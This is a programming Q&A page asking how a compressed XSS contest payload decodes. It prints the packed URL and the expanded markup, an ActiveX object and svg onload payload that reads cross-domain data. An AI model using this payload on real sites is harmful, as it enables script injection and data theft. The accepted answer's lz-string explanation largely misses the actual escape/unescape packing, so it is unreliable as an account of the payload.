javascript - How does this JavaScript compression technique work?

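I was going through the results of a security contest involving XSS (link) and found some wonderful and scary JS XSS payloads. The winner (@kinugawamasato) used a JavaScript compression technique that seems completely otherworldly to me:

Compressed payload: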

https://cure53.de/xmas2013/?xss=<scriPt>document.write(unescape(escape(location)
.replace(/u(..)/g,'$1%')))<\/scriPt>㱯扪散琠楤㵥⁣污獳楤㵣汳楤㨳㌳䌷䉃㐭㐶うⴱㅄ〭
䉃〴ⴰ〸ぃ㜰㔵䄸㌠潮牯睥湴敲㵡汥牴⠯繷⸪ℱ⼮數散⡲散潲摳整⠰⤩⤾㱳癧⁯湬潡搽攮摡瑡畲氽慬汛攮
牯睤敬業㴳㍝⬧㽳慮瑡㵀Ⅱ汬潷彤潭慩湳㴧⭤潭慩渻攮捨慲獥琽❵瑦ⴷ✾

What actually happens:

<object id=e classid=clsid:333C7BC4-460F-11D0-BC04-0080C7055A83 onrowenter=alert(/~w.*!1/.exec(recordset(0)))><svg onload=e.dataurl=all[e.rowdelim=33]+'?santa=@!allow_domains='+domain;e.charset='utf-7'>
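The decoding expression in the URL can be traced in isolation. The sketch below assumes the packing works the way the two listings suggest: each pair of ASCII characters is stored as one 16-bit character (first character in the high byte, second in the low byte). `escape` renders such a character as `%uXXXX`, the `replace` call rewrites that to `%XX%XX`, and `unescape` turns it back into two characters. The `pack` helper is hypothetical and is not part of the contest entry; `unpack` applies the payload's own expression to a string instead of `location`.

```javascript
// Hypothetical helper: pack pairs of printable ASCII characters into one
// 16-bit character each (first char in the high byte, second in the low byte).
function pack(ascii) {
  if (ascii.length % 2 === 1) ascii += " "; // pad to an even length
  let out = "";
  for (let i = 0; i < ascii.length; i += 2) {
    const hi = ascii.charCodeAt(i);
    const lo = ascii.charCodeAt(i + 1);
    out += String.fromCharCode((hi << 8) | lo);
  }
  return out;
}

// Same expression as in the payload, applied to an arbitrary string.
// escape("\u3C6F") gives "%u3C6F"; the regex turns "u3C" into "3C%",
// leaving "%3C%6F", which unescape decodes to "<o".
function unpack(packed) {
  return unescape(escape(packed).replace(/u(..)/g, "$1%"));
}

const firstTwo = unpack("\u3C6F\u626A"); // first two characters of the payload tail
console.log(firstTwo);
console.log(unpack(pack("<svg onload=1>")));
```

Here `unpack("\u3C6F\u626A")` returns `<obj`, which matches the start of the expanded markup. Note that `escape` and `unescape` are deprecated but still available in browsers and Node.js.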

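Is this technique already documented somewhere so that I can study it? How exactly does this thing work? Is there already a JavaScript compressor that does this automatically? How would a WAF react to a payload like this?

You can see more examples here.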

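Best answer

I am using the lz-string library for JS compression whenever I put any data into localStorage. I am just a user of this library, not a compression expert. But this is the information that can be found around that tool...

Goal of lz-string: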

lz-string was designed to fulfill the need of storing large amounts of data in localStorage, specifically on mobile devices. localStorage being usually limited to 5MB, all you can compress is that much more data you can store.

... I (note: "I" means, Pieroxy, author of the lz-string) started out from an LZW implementation (no more patents on that), which is very simple...

So the basis of this implementation is LZW, which was mentioned in Javascript client-data compression by Andy E. Let me point to

the Wikipedia article on LZW
LZW compression example

Excerpt from Wikipedia - Algorithm:

The scenario described by Welch's 1984 paper encodes sequences of 8-bit data as fixed-length 12-bit codes. The codes from 0 to 255 represent 1-character sequences consisting of the corresponding 8-bit character, and the codes 256 through 4095 are created in a dictionary for sequences encountered in the data as it is encoded. At each stage in compression, input bytes are gathered into a sequence until the next character would make a sequence for which there is no code yet in the dictionary. The code for the sequence (without that character) is added to the output, and a new code (for the sequence with that character) is added to the dictionary.

Wikipedia - Encoding :

A high level view of the encoding algorithm is shown here:

1. Initialize the dictionary to contain all strings of length one.
2. Find the longest string W in the dictionary that matches the current input.
3. Emit the dictionary index for W to output and remove W from the input.
4. Add W followed by the next symbol in the input to the dictionary.
5. Go to Step 2.
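The encoding steps quoted above can be sketched in a few lines of JavaScript. This is a textbook-style illustration, not lz-string's code: it assumes every input character is in the 0 to 255 range, emits plain integer codes instead of fixed-width 12-bit ones, and lets the dictionary grow without limit. The function names are made up for this example.

```javascript
// Minimal LZW encoder following the quoted steps.
// Assumption: every character of `input` has a char code below 256.
function lzwCompress(input) {
  const dict = new Map();
  for (let i = 0; i < 256; i++) dict.set(String.fromCharCode(i), i); // step 1
  let nextCode = 256;
  let w = "";
  const out = [];
  for (let i = 0; i < input.length; i++) {
    const c = input[i];
    if (dict.has(w + c)) {
      w += c;                      // step 2: keep extending the match
    } else {
      out.push(dict.get(w));       // step 3: emit the code for W
      dict.set(w + c, nextCode++); // step 4: add W + next symbol
      w = c;
    }
  }
  if (w !== "") out.push(dict.get(w));
  return out;
}

// Matching decoder: rebuilds the same dictionary while reading the codes.
function lzwDecompress(codes) {
  if (codes.length === 0) return "";
  const dict = new Map();
  for (let i = 0; i < 256; i++) dict.set(i, String.fromCharCode(i));
  let nextCode = 256;
  let w = dict.get(codes[0]);
  let result = w;
  for (let i = 1; i < codes.length; i++) {
    const k = codes[i];
    let entry;
    if (dict.has(k)) entry = dict.get(k);
    else if (k === nextCode) entry = w + w[0]; // code defined by this very step
    else throw new Error("Invalid code: " + k);
    result += entry;
    dict.set(nextCode++, w + entry[0]);
    w = entry;
  }
  return result;
}

const codes = lzwCompress("TOBEORNOTTOBEORTOBEORNOT");
console.log(codes.join(","));
console.log(lzwDecompress(codes));
```

For the 24-character input `TOBEORNOTTOBEORTOBEORNOT` the encoder emits 16 codes; the codes at 256 and above stand for repeated substrings such as `TO` and `BE`.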

How it works in the case of lz-string, as far as we can observe:

Source code: lz-string-1.3.3.js

Let me quote a few steps from the lz-string source already mentioned:

What I did was:

1. localStorage can only contain JavaScript strings. Strings in JavaScript are stored internally in UTF-16, meaning every character weight 16 bits. I modified the implementation to work with a 16bit-wide token space.
2. I had to remove the default dictionary initialization, totally useless on a 16bit-wide token space.
3. I initialize the dictionary with three tokens:
   - An entry that produces a 16-bit token.
   - An entry that produces an 8-bit token, because most of what I will store is in the iso-latin-1 space, meaning tokens below 256.
   - An entry that mark the end of the stream.
4. The output is processed by a bit stream that stores effectively 16 bits per character in the output string.
5. Each token is stored with just as many bits that are needed according to the size of the dictionary. Hence, the first token takes 2 bits, the second to 7th three bits, etc....
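To make the "bit stream that stores 16 bits per character" idea concrete, here is a rough sketch of packing variable-width tokens into JavaScript string characters. It is not lz-string's actual code: the helper name `packTokens`, the `{ value, bits }` token shape, and the most-significant-bit-first order are all assumptions chosen for readability.

```javascript
// Hypothetical bit packer: each token carries a value and the number of bits
// used to store it. Bits are written most significant first (an assumption),
// and every 16 collected bits become one character of the output string.
function packTokens(tokens) {
  let out = "";
  let acc = 0;    // bits collected for the current output character
  let filled = 0; // how many bits of `acc` are in use
  for (const { value, bits } of tokens) {
    for (let i = bits - 1; i >= 0; i--) {
      acc = (acc << 1) | ((value >> i) & 1);
      filled++;
      if (filled === 16) {
        out += String.fromCharCode(acc);
        acc = 0;
        filled = 0;
      }
    }
  }
  // Flush the last, partially filled character, padded with zero bits.
  if (filled > 0) out += String.fromCharCode(acc << (16 - filled));
  return out;
}

// A 2-bit token followed by a 3-bit token share one 16-bit character:
// bits 01 and 101, then 11 zero bits of padding, give 0x6800.
const small = packTokens([{ value: 1, bits: 2 }, { value: 5, bits: 3 }]);
console.log(small.charCodeAt(0).toString(16));

// Two 8-bit tokens fill exactly one character.
const two = packTokens([{ value: 0x48, bits: 8 }, { value: 0x69, bits: 8 }]);
console.log(two.charCodeAt(0).toString(16));
```

Because any 16-bit pattern can come out of such a packer, the result may contain code units like a lone surrogate (for example 0xD800), which is why the output is not guaranteed to be well-formed UTF-16.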

OK, now we know that these compression techniques leave us with 16-bit information. We can test this in the demo: http://pieroxy.net/blog/pages/lz-string/demo.html (or/and another one here)

It converts: Hello, world. into

85 04 36 30 f6 60 40 03 0e 04 01 e9 80 39 03 26
00 a2

So we need one last step; let me quote again:

Well, this lib produces stuff that isn't really a string. By using all 16 bits of the UTF-16 bitspace, those strings aren't exactly valid UTF-16. By version 1.3.0, I added two helper encoders to produce stuff that we can do something with:

compress produces invalid UTF-16 strings. Those can be stored in localStorage only on webkit browsers (Tested on Android, Chrome, Safari). Can be decompressed with decompress

Continuing our example, Hello, world. would be converted to

҅〶惶̀Ў㦀☃ꈀ

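And that is finally it. We can see that all of those ...characters other than Latin ones... come from the final conversion into UTF-16. Hopefully this gives some hints...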

Regarding javascript - How does this JavaScript compression technique work?, we found a similar question on Stack Overflow: https://stackoverflow.com/questions/23120115/
